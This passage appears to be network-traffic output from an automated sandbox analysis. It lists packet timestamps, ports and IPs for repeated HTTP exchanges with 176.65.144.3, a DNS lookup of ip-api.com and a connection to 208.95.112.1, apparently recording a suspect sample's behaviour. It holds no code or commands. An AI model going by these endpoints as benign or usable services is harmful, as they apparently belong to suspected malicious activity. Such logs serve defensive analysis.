                                                                  Mar 18, 2025 08:03:23.046080112 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.050818920 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.050837040 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.050920963 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.164920092 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.164938927 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.164949894 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165003061 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165045023 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165055990 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165055990 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.165055990 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.165066957 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165081024 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165113926 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.165113926 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.165957928 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165968895 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165981054 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.166062117 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.166362047 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.166373014 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.166397095 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.166409016 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.166416883 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.166420937 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.166445971 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.166497946 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.167248011 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.167259932 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.167279005 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.167289972 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.167303085 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.167342901 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.167342901 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.221187115 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.283869982 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283890009 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283910036 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283925056 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283936024 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283946991 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283958912 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283983946 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.283983946 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.284010887 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.284024000 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.284056902 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.284753084 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.284805059 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.284881115 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.285058975 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285070896 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285082102 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285094976 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285106897 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285118103 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285129070 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.285129070 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.285132885 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285151958 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.285177946 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.285929918 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285942078 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285953045 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285995007 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286005974 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286010027 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.286017895 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286031961 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286039114 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.286113977 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.286828995 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286840916 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286853075 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286894083 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.286894083 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.286925077 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286936998 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286947012 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286958933 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286986113 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.287025928 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.287652969 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.330555916 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.402841091 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.402859926 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.402874947 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.402901888 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.402913094 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.402960062 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.402960062 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.402972937 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403000116 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403033972 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.403040886 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403093100 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.403114080 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403175116 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403194904 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403234959 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.403283119 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403312922 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403323889 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403340101 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.403445005 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.403522968 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403537035 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403544903 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403565884 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403580904 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403594971 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403608084 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403621912 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.403621912 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.403652906 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.404088020 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.404102087 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.404115915 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.404153109 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.404155016 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.404167891 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.404181004 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.404198885 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.404254913 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.404268026 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.404282093 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.404294968 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.404314995 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.404324055 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.404350996 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.404869080 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.404881954 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.404895067 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.404930115 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.404952049 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.405021906 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.405035019 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.405046940 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.405066013 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.405080080 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.405109882 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.405112982 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.405128002 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.405142069 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.405165911 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.405167103 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.405215025 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.405834913 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.405848026 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.405863047 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.405903101 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.405982971 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.406008005 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.406022072 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.406034946 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.406049013 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.406059027 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.406061888 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.406078100 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.406083107 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.406094074 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.406095028 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.406147003 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.406758070 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.406831026 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.495167017 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.495183945 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.495269060 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522042036 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522100925 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522114992 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522130966 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522188902 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522192001 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522202969 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522217989 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522259951 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522300959 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522326946 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522326946 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522341013 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522353888 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522358894 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522376060 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522389889 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522403955 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522435904 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522589922 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522634029 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522646904 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522666931 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522689104 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522699118 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522702932 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522718906 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522733927 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522753954 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522779942 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522783995 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522806883 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522881985 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522895098 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522908926 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522919893 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522922039 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522937059 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522958994 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522969007 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522969007 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.522973061 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.522988081 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523005009 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.523052931 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.523556948 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523577929 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523600101 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523612976 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523626089 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523637056 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523647070 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523685932 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.523686886 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.523751974 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523772955 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523787022 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523801088 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523823977 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523829937 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.523839951 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523852110 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.523854971 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523870945 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523874998 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.523885965 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523906946 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.523909092 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.523948908 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.524452925 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524466038 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524480104 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524518967 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.524522066 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524537086 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524545908 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.524552107 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524568081 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524599075 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.524616003 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.524677992 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524691105 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524707079 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524729013 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524744034 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524760962 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.524784088 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524797916 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524797916 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.524813890 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524830103 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524846077 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.524857998 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.524857998 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.524903059 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.525505066 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525523901 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525540113 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525553942 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525568962 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525582075 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525583029 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.525598049 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525605917 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.525625944 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.525649071 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525666952 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525684118 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525696039 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525710106 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525715113 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.525715113 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.525723934 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525738955 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525753975 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525759935 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.525769949 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525779009 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.525791883 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.525841951 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.526325941 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.526339054 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.526359081 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.526379108 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.526386023 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.526393890 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.526408911 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.526423931 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.526432991 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.526432991 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.526489019 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.704240084 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:24.015414000 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:24.015577078 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:24.356291056 CET4972480192.168.2.4208.95.112.1
                                                                  Mar 18, 2025 08:03:24.362137079 CET8049724208.95.112.1192.168.2.4
                                                                  Mar 18, 2025 08:03:24.362227917 CET4972480192.168.2.4208.95.112.1
                                                                  Mar 18, 2025 08:03:24.362596035 CET4972480192.168.2.4208.95.112.1
                                                                  Mar 18, 2025 08:03:24.368684053 CET8049724208.95.112.1192.168.2.4
                                                                  Mar 18, 2025 08:03:24.850461006 CET8049724208.95.112.1192.168.2.4
                                                                  Mar 18, 2025 08:03:24.893063068 CET4972480192.168.2.4208.95.112.1
                                                                  Mar 18, 2025 08:03:25.256035089 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:33.448631048 CET6508053192.168.2.4162.159.36.2
                                                                  Mar 18, 2025 08:03:33.453320980 CET5365080162.159.36.2192.168.2.4
                                                                  Mar 18, 2025 08:03:33.453407049 CET6508053192.168.2.4162.159.36.2
                                                                  Mar 18, 2025 08:03:33.458200932 CET5365080162.159.36.2192.168.2.4
                                                                  Mar 18, 2025 08:03:33.902091026 CET6508053192.168.2.4162.159.36.2
                                                                  Mar 18, 2025 08:03:33.907059908 CET5365080162.159.36.2192.168.2.4
                                                                  Mar 18, 2025 08:03:33.907128096 CET6508053192.168.2.4162.159.36.2
                                                                  Mar 18, 2025 08:04:40.244647980 CET8049724208.95.112.1192.168.2.4
                                                                  Mar 18, 2025 08:04:40.244805098 CET4972480192.168.2.4208.95.112.1
                                                                  Mar 18, 2025 08:05:04.862266064 CET4972480192.168.2.4208.95.112.1
                                                                  Mar 18, 2025 08:05:04.867058992 CET8049724208.95.112.1192.168.2.4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Mar 18, 2025 08:03:24.330837965 CET5651353192.168.2.41.1.1.1
                                                                  Mar 18, 2025 08:03:24.337415934 CET53565131.1.1.1192.168.2.4
                                                                  Mar 18, 2025 08:03:33.447439909 CET5363543162.159.36.2192.168.2.4
                                                                  Mar 18, 2025 08:03:33.921622038 CET6084753192.168.2.41.1.1.1
                                                                  Mar 18, 2025 08:03:33.942161083 CET53608471.1.1.1192.168.2.4
                                                                  Mar 18, 2025 08:03:35.179347038 CET4938553192.168.2.41.1.1.1
                                                                  Mar 18, 2025 08:03:35.190536022 CET53493851.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Mar 18, 2025 08:03:24.330837965 CET192.168.2.41.1.1.10x7743Standard query (0)ip-api.comA (IP address)IN (0x0001)false
